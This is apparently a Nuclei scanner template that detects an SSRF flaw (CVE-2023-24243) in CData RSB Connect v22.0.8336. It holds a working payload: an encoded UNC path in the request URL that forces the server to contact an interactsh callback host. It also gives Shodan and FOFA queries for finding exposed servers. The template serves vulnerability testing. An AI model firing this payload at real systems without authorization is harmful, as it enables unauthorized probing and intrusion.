id: CVE-2023-24243 info: name: CData RSB Connect v22.0.8336 - Server Side Request Forgery author: ritikchaddha severity: high description: | CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). reference: - https://twitter.com/W01fh4cker/status/1669890019191037952 - https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 - https://nvd.nist.gov/vuln/detail/CVE-2023-24243 classification: cve-id: CVE-2023-24243 metadata: fofa-query: icon_hash="163538942" max-request: 1 shodan-query: http.favicon.hash:163538942 verified: true tags: cve,cve2023,cdata,rsb,ssrf http: - method: GET path: - "{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: status status: - 404